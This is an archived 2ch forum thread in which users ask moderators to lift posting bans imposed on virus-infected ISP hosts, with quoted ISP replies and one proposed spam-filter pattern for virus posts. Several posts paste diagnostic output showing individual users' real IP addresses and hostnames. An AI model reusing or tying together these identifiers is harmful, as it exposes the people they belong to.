おお、乙です乙です。m(_ _)m
道ができてよかったですー
シマンテックのオンラインスキャンでは「VBS.Freelink.B 」に感染してると出ました。
友人の指導でインターネットエクスポーラーのツール開いて
インターネットオプションの中の全般の中段に有るインターネット一時ファイルの
真ん中の「ファイルの削除」を実行しました。
再度シマンテックのオンラインスキャンを実行しましたら
「感染無し」と出ましたので、ご報告致します。
これで規制解除して貰えるのでしょうか?
aitaiから返信来た。
元々管理人か代理人からしか受け付けないみたいね。
で、利用規約を明示したURLがいるらしい。
ガイドラインでいいんかいな?
送信してみた。
プロバイダごとにいろいろ決まりがあるんだねぇ。
906です。診断書忘れてました。
風呂敷確認君 3.00
--------------------------------------------------------------------------------
Your diagnosis.
HOST NAME : 58-70-19-197.eonet.ne.jp
IP ADDRESS : 58.70.19.197
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER :
http://info.2ch.net/wiki/pukiwiki.php?%A4%CA%A4%F3%A4%AB%B5%AC%C0%A9%A4%B5%A4%EC%A4%C6%A4%A4%A4%EB%A4%DF%A4%BF%A4%A4%A4%CA%A4%F3%A4%C7%A4%B9%A4%AC%A1%C4 HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
REMOTE_ADDR : 58.70.19.197
REMOTE_HOST : 58-70-19-197.eonet.ne.jp
REMOTE_PORT : 33120
-- DSBL --
58.70.19.197 -> None(^-^)
-- BBQ --
58.70.19.197 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
58.70.19.197 -> None(^-^)
Observation...
BBQにされていますね。さてどうしましょ。。
--------------------------------------------------------------------------------
風呂敷確認君 3.00(2006/08/20)
解除よろしくお願いしますね。
PCでBBQエラーが出て書き込めません。
フシアナサンしたくてもやはりBBQエラーがでてかけません
どうしたらいいですか?
>>909 このスレの上のほうで、診断書のコピペをしたヤシは放置希望(=永久アク禁希望)と
書いたものとみなす、という話になってたな
ご愁傷様w
aitaiから返信来ました。転載は後ほど。
焼きの人、phoenix.aitai.ne.jp解除お願いします。
>>914 携帯だからメールは確認できたけど解除まではできない
でもきちんと確認はしたから誰かよろしく
ってことですよね?
phoenix.aitai.ne.jp
解除しました
rafale ★さんこそお疲れ様でした
私はボタンを押しただけですので
返信遅れてしまい申し訳ありませんでした。規制解除、真にありがとうごます。
これからも皆さん頑張って下さい。なにかありましたらまた相談しに着させ
ていただきますと思いますのでその時はなにとぞ宜しくお願いいたします。
それでは失礼させていただきます。ありがとうございました。
909です。ごめんなさい診断書貼りまして。100位まではよく貼って有ったので
貼った方が良いのかと思いまして・・・でも良く見たら373で注意が有りました。
すんませんでした。もう私永久放置なのですね
aitai転載〜
お世話になります。
Aitai net事務局でございます。
ご連絡遅くなりまして誠に申し訳ありません。
こちらにいただいた情報をもとに弊社で調査を行い、
該当ユーザに対し対策ソフトを使って駆除を行うよう
ご連絡させていただきました。
該当ユーザが対応完了するまでに時間を要する場合もございます。
恐れ入りますが、 1週間程度様子をみていただき、
状況が改善されない場合には、再度最新のメールヘッダー
情報をご連絡ください。
よろしくお願い致します。
そいやお礼のメールっているんかいな?
報告人スレの方では送ってるみたいだけど。
>>926 aitaiは結局ウイルス関係は
代理人経由でいくってことですか?
>>928 そんなもんかぁ。
どうしたもんかね。
>>929 向こうが管理人か代理人っつって来てるからね。
代理人指定はそのつど増やしていけばいいような
そしてそれが指定されていないからで対応できないのなら
対応できないままで終わればいいんじゃないのかなと
そんな感想。。。
>>930 お疲れ様です。
そう何度もある事じゃないかもしれませんが、
結局は人間関係ですし。
送られた方が良いのではないかと。
924さんへ、私もっともっと勉強してから訪れます。再度訪れました節には
よろしくお願いします。それじゃ皆様お元気で923でした。
>>934 で、対処はしたのかと。
解除して欲しいならログ読んで申請汁
Your diagnosis.
HOST NAME : f70-224.ppp.cds.ne.jp
IP ADDRESS : 210.254.70.224
-- %ENV[Environment variable] --
HTTP_ACCEPT_LANGUAGE : ja
HTTP_CONNECTION : Keep-Alive
HTTP_REFERER : http://info.2ch.net/wiki/pukiwiki.php?%A5%D7%A5%ED%A5%AF%A5%B7%A4%B8%A4%E3%A4%CA%A4%A4%A4%CE%A4%CBPROXY%B5%AC%C0%A9%A4%CB%B0%FA%A4%C3%A4%AB%A4%AB%A4%C3%A4%BF%BE%EC%B9%E7%A4%CE%C2%D0%BD%E8%CB%A1
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Sleipnir/2.45
REMOTE_ADDR : 210.254.70.224
REMOTE_HOST : f70-224.ppp.cds.ne.jp
REMOTE_PORT : 1355
-- DSBL --
210.254.70.224 -> None(^-^)
-- BBQ --
210.254.70.224 -> Roasted(-_-)
-- BBX(Unrelated to the proxies.) --
210.254.70.224 -> None(^-^)
Observation...
BBQにされていますね。さてどうしましょ。。
>>935 すいませんでした。
対処済みです 解除お願いします >>936
診断書はいりません。
>>398
・名前欄に「fusianasan」と入れてあなたのホストを表示
・使用したアンチウィルスソフトorサービス(無論、ウイルス定義は最新で)
・ウィルス定義のエンジンバージョン・DATバージョン
・見つかった(駆除した)ウィルスの名称 >>937 覚えてることが
ewido security suiteを使った
苺きんたま
1ヶ月以上前に駆除したから詳細おぼえてないな・・・
>>940
sechttp***(ウイルス焼き)の@niftyに交渉する作業スレ
ニフティの常時危険セキュリティ24 part1
経過はこれ
http://pc8.2ch.net/test/read.cgi/nifty/1132102437/281
http://pc8.2ch.net/test/read.cgi/nifty/1132102437/331
http://pc8.2ch.net/test/read.cgi/nifty/1132102437/346
http://pc8.2ch.net/test/read.cgi/nifty/1132102437/349
http://pc8.2ch.net/test/read.cgi/nifty/1132102437/423
外部掲示板への迷惑行為につきましては、該当掲示板の管理者様が掲示板の
運営方針に基づき、対応していただくべき問題と考えております。
そのため、掲示板上にログ情報が公開されておりましても、実際ウイルスに
よる行為等、詳細な状況を把握できるのは掲示板の管理者様であることから、
直接管理者様より弊社へご連絡いただかない限り、弊社では何らかの対応をお
取りすることはいたしかねます。この点について、何卒ご了承ください。
ご連絡いただきありがとうございました。
@nifty メールサポートセンター
@nistyがすべてこの定型文を返して手詰まり状態です
掲示板管理者側からの要請だと動くと受け取れる文章なので
そちらからお願いできないでしょうか
よろしくお願いします >>942 その16の文章書いた本人ですが
そういう誘導に使われるのはたいへん不本意ですね
上記スレ(ニフティの常時危険セキュリティ24)はウイルスを駆除することを趣旨にやってるわけで
そういう対処療法的応急処置(=sec2chd/1156495663/16)なことではないですよ
文章が長くなるので16のものはあれでも相当端折って書いてますが
このサービスに入っている何割かの人は権限がないために16の方法は実際には出来ないんです
だから1ヶ月間書けないままの人がいるということでウイルス駆除を目標にやっているのが上の作業スレです
>>940 という事情ですので、経過は
>>941か上記作業スレをご覧になればわかると思います
ご検討をよろしくお願いします
アッカ大阪.niftyは対応したのにsec.niftyは対応しないと
なかなか面白いですね
1つ解除すればBIGLOBEとかも同様の扱いじゃないかな。
NIFTYだけと言う訳にはいかんでしょう。
でもこれウイルスじゃなくて広告宣伝荒しだった場合どうするのかね。
2chって共有IPからの広告荒しにはどういうスタンスとってたっけ。
>>949 NIFTYのセキュリティは串だから、焼却。
>>949 【DSBL】PROXY規制中!【報告無用】43
http://qb5.2ch.net/test/read.cgi/sec2chd/1156495663/195 195 名前:SweetRock ★[sage] 投稿日:2006/08/31(木) 07:34:24 ID:???0
>>194 tsechttp***.sec.nifty.comからの継続的な
広告荒らしのためBBQ処理されています。
>>16 を参考になさってくださいです。
解除はないな
>>951 それと今回の件は別物です。
代理人さんはまだかな?
何でacoskaのときはきちんと応対してくれたのに今回はダメなんですかね
全部共有だから調べるのが大変だからじゃないですかねー。
すいませんが、
どういった感じのメールを送信し、対処要請したらよいのか分からないので、
送信メール用のテンプレをどなたか作っていただけないでしょうか?
また広域焼きに引っかかったのか?w
台風停電でモデムリセットされたら書けなくなっちゃったよorz
ん〜、外せば書けるんだし、放置かなとも思ったんですが。
解除を望んでるユーザーはいるわけで
あとはまぁどっちを向くか、なんじゃないかなー
>>957 放置はさすがにひどくないですか?
まだ一回目なんですよね?
定型メールしか返してこないとか舐められてるんでしょ
じゃ何か返信してみますかね
てかここに誘導されたんですけど
常時安全セキュリティ24がウィルス焼きって・・・ネタ?
誰?
いつもの呼ばわりされるほど書き込む板・スレなんかないぞ
ブラウザもデフォルトでsageチェック入れたままだし
どうせセキュ切ったままなんかしたんだろ
このまま放っとけばセキュ切って2chに書き込み→そのままネットして感染って流れで感染者増えるんだから解除した方がよくないか?
>>958 ローカルISPから上流ISPに対応依頼を出してもらったのだが、
又貸し回線まで面倒見れんと返事が来た。
俺は広域喰らったのは今回で2回目。
SEC24がこんなにひどい状況になるなんて予想もつきませんでした
まだでしょうか?
解除申請も無理ってことですか?
やり方もよくわかんねーからいいか・・
オレ自身はなんもしてないのにな。。広告なんて出してもいねーし
はぁぁぁ 卒業かついに
>>957 これ最後のレスにしますが
rafale ★さんに"通報"をお願いしてるんですね
"書ける"とか"書けない"とかよりもとりあえずはまず
ウイルスを駆除する、ウイルスを残してたままにしないということを目標にやってきているわけですね
その作業スレで@niftyへメールの送信とかを手伝っていただいた人やその他の人も
"書ける"人なので自分たちが困ってるからとかいう意図ではないわけです
権限が無くて"書けない"人はいるが、そういう人はスレ自体に出てくることは出来ないので
上記スレに出てきている人はすべて"書ける"人なわけです
数年前の段階で今流行っているウイルスを想像できなかったように
今後どのようなウイルスが流行るかわからないので、ウイルスを駆除する道を確保しておきたいと言うことです
現状ではウイルス駆除の道が確保されておりませんウイルスは残ったままです
掲示板側からのアクションなら動くという文面なのでrafale ★さんから"通報"していただくと
@niftyは動いてウイルス駆除を該当ユーザーに指導するはずです
ぜひrafale ★さんに"通報"をお願いします
それ以外のことはまた次の段階の話です
http://www.nifty.com/sec24/func.htm 2ちゃんに書ける・書けないとか掲示板管理者からの通報があった・なかったは置いといて
黙ってても目標は達成されていなきゃおかしいんじゃないか
ここやPROXY規制スレ見る限りシマンテックの定義ファイルはウィルスと認識してると思うんだが
>>976 んと、ウイルス分解除しても広告で焼かれてるから書けないよ。
それでもいいのなら考えますけど。
>>978 sechttpの方はまだ広告規制ないんですよね?
>>979 ないね。
ウイルス以外で焼かれても泣かない?
>>978 お疲れさまです、
ウイルス焼きはsecの方ですね
>>979 春頃からsecの広告荒らしはありました
規制されてからtsecに切り替えた、ということです。
>>980 広告規制はしょうがないですよね・・・
せめて今回のは解除できそうなんだから解除してほしいです
>>982 広告荒らしでも通報して対応していただけるならば
通報してはいけない、ということはないと思いますが
>>983 広告まで通報してたらきりがないかと。
少なくともそれ用の部隊作るとかしないと回らないっしょ。
そですね、
うーん
次スレの時期ですが
テンプレとかいらないのかしら
あと
>>975 の案件と
>>975 うお、気づいてなかった。
メール作成します。
>>985 ありがとです〜
ん〜、テンプレも考えなきゃですねぇ。
>>975 klist見たら止まってるっぽいねぇ。
これはメールするまでもなく一旦解除か?
俺権限(あるのかw)で
amigo範囲焼き解除しました。
再発したら連絡入れるってことで。
テンプレに必要なもの
・フシアナしてください
・klistへのリンクっつか探し方?
・俺への呼び出しはageで
あとなんだろ〜
ユーザーさんが貰ったISPからのメール転載(管理人・代理人から連絡待ってますの)とか?
いまだ解除の気配なしorz
----- 以下、NTTコミュからのお返事
NTTPC *です。お世話になります。
申告の件ですが、内容は理解出来ました。
ただ、現在頂いている内容だけでは
情報が不足していて対応に動けないところがあります。
(/24)の範囲の中でも
・具体的にどのIPアドレスが(/32レベル)
・日時的にいつ(何月何日の何時何分頃)
悪さをしていたのか、
これがわからないと行為者の特定しようがないためです。
御社もその道の方ですから
状況は察しがつくと思いますが、
ご指摘のIPアドレスの範囲(/24)は、
フレッツ大分において
利用者の接続時に、利用者端末へ動的に付与される
プールアドレスとして設定されているものです。
そしてネットワーク設備自体は
御社も含め、
複数の2次ISPにより共用で利用されております。
つまり、前述した情報を頂かないと
『どの2次ISPの会員が
その時間帯に該当のIPアドレスを掴んでいたのか』
を特定出来ず、該当する2次ISPへ対処を依頼出来ません。
また念のため申し上げますが、
弊社として対応出来る範囲は、
頂いた情報を元に行為者が所属すると思わしき2次ISPに対して
『この時間帯に、このIPアドレスを掴んでいた会員様が
この様な行為をされていたとの、第三者申告があります。
利用規約に沿って、対処頂けますようお願いします。」
とお願いするところまでとなります。
つまり、行為自体は行為者に問題があり、
その管理責任は利用規約に沿って2次ISPにあるもので、
弊社がウイルス駆除に出向くことはないですし、
勝手に利用停止処理を行ったりするなど、
対処主体には成り得ないということです。
以上が現時点でお話出来る内容の全てです。
>>988 解除ありがとうございました。再発の時は連絡お願いします_(._.)_
報告のみですが失礼します
>>310のウイルスはどうにかなりませんでしょうか?
厨房板の最長スレくる。フシアナサンしてage。
本文は、一定のエラー文字列に空改行、ファイル名は変動。
個人的にはbbs.cgiのIsKoukokuフィルターに、
^
\nException EIdSocketError in module WINDOWS:SVCHOST.exe at 00066EA8.
\nSocket Error # 11001
\nHost not found.
\n$
これのパターンを登録すれば止まるじゃないかなと思う。
フィルターが働くのがbbs=kitchen限定にできればもっといいです。
>>996 どこかでRockの人に相談しれ。
こっちは何もできん。
あと、板別とか無理。
sechttpとk-optiにメールしますが
リアルの事情により日曜以降になるぽ。
忘れてる訳じゃないんでひとつ。
1000が近いんでレス不要。
なんとなく解除されたっぽいw
また広域喰らったらレスします
お世話かけました
各煮へのウイルス爆撃とのことですがウィルスバスター2007での検索ではウィルスは検出されませんでした。
検索エンジンバージョン:8.32.1003 / パターンファイル番号:3.781.50
感染の心当たりとしては数ヶ月前の山田ウィルス(詳細不明)感染があります。
その際は手動で削除を行いました。
感染期間は1日から3日程度です。
御迷惑をおかけしましたが今後は一層の注意を払いたいと思います。
可能でしたらBBQの解除をお願いします。
勝手にインターネット「接続」が起動するウイルスに悩まされています。
そのパソコンはインターネットにつなげる環境にないので(何かのファイルから感染したようです)
そのウインドウを放置しておけば何も起こらないのですが、うっとおしいのでインターネット関連の
プログラムをすべて削除しようとしたら、ゴミ箱に送ったとたんに再びファイルが再生されてしまいました。
Repsackというファイルも同様に削除できません。
どんなウイルスが原因なのでしょうか。
lud20241209143955caこのスレへの固定リンク: http://5chb.net/r/sec2chd/1145344117/
ヒント:5chスレのurlに http://xxxx.5chb.net/xxxx のようにbを入れるだけでここでスレ保存、閲覧できます。
TOPへ TOPへ
全掲示板一覧 この掲示板へ 人気スレ |
>50
>100
>200
>300
>500
>1000枚
新着画像
↓「□規制解除要望□ ウイルス焼き専用★1【PROXY規制中!】->画像>1枚 」を見た人も見ています:
・□規制解除要望□ dsn.jp専用
・□規制解除要望□ bbexcite.jp専用
・□規制解除要望□ t-com.ne.jp 専用
・□規制解除要望□ dion.ne.jp専用 Part 148
・□規制解除要望□ dion.ne.jp専用 Part 179
・□規制解除要望□ hi-ho.ne.jp 専用 Part 2
・□規制解除要望□ dion.ne.jp専用 Part 165
・□規制解除要望□ dion.ne.jp専用 Part 171
・□規制解除要望□ dion.ne.jp専用 Part 141
・□規制解除要望□ dion.ne.jp専用 Part 139
・□規制解除要望□ dion.ne.jp 専用 Part 104
・□規制解除要望□ dion.ne.jp専用 Part 3489
・□規制解除要望□ dion.ne.jp専用 Part 3487
・□規制解除要望□ dion.ne.jp 専用 Part 103
・□規制解除要望□ dion.ne.jp 専用 Part 105
・□規制解除要望□ dion.ne.jp 専用 Part 101
・□規制解除要望□ dion.ne.jp 専用 Part 112
・□規制解除要望□ dion.ne.jp専用 Part 3485
・□規制解除要望□ dion.ne.jp 専用 Part 115
・□規制解除要望□ dion.ne.jp専用 Part 3678
・□規制解除要望□ dion.ne.jp 専用 Part 127
・□規制解除要望□ dion.ne.jp専用 Part 3624
・□規制解除要望□ dion.ne.jp専用 Part 3675
・□規制解除要望□ dion.ne.jp専用 Part 3669
・□規制解除要望□ dion.ne.jp 専用 Part 123
・□規制解除要望□ dion.ne.jp専用 Part 3619
・□規制解除要望□ dion.ne.jp専用 Part 3681
・□規制解除要望□ dion.ne.jp専用 Part 3677
・□規制解除要望□ dion.ne.jp専用 Part 3601
・□規制解除要望□ dion.ne.jp専用 Part 3652
・□規制解除要望□ dion.ne.jp専用 Part 3574
・□規制解除要望□ dion.ne.jp専用 Part 3637
・□規制解除要望□ dion.ne.jp専用 Part 3634
・□規制解除要望□ dion.ne.jp専用 Part 3647
・□規制解除要望□ dion.ne.jp専用 Part 3533
・□規制解除要望□ dion.ne.jp専用 Part 3532
・□規制解除要望□ dion.ne.jp専用 Part 3648
・□規制解除要望□ ppp.prin.ne.jp 専用 Part 9
・□規制解除要望□ dion.ne.jp専用 Part 3629
・□規制解除要望□ dion.ne.jp専用 Part 3630
・□規制解除要望□ dion.ne.jp専用 Part 36590
・□規制解除要望□ dion.ne.jp専用 Part 3651
・□規制解除要望□ dion.ne.jp専用 Part 3596
・□規制解除要望□ ppp.prin.ne.jp 専用 Part 20
・□規制解除要望□ ppp.prin.ne.jp 専用 Part 10
・□規制解除要望□ ppp.prin.ne.jp 専用 Part 28
・□規制解除要望□ ppp.prin.ne.jp 専用 Part 37
・□規制解除要望□ infoweb.ne.jp 専用[06/08/21]
・□規制解除要望□AOL専用
・□規制解除要望□静岡県民専用5
・□規制解除要望□asahi-net専用
・□規制解除要望□bb.excite専用
・□規制解除要望□home.ne.jp専用
・□規制解除要望□QTNetBBIQ専用2
・□規制解除要望□home.ne.jp専用
・□規制解除要望□leo-net.jp専用
・□規制解除要望□prin.ne.jp専用
・□規制解除要望□ODN専用 part18
・□規制解除要望□hi-ho.ne.jp専用
・□規制解除要望□ODN専用 part17
・□規制解除要望□yournet専用★34
・□規制解除要望□ODN専用 part17
・□規制解除要望□ODN専用 part16
・□規制解除要望□YahooBB専用 7th
・□規制解除要望□eonet.ne.jp専用
15:58:02 up 4 days, 2:22, 0 users, load average: 7.78, 8.21, 9.07
in 2.0296788215637 sec
@2.0296788215637@0b7 on 121605
|
ブックマークへ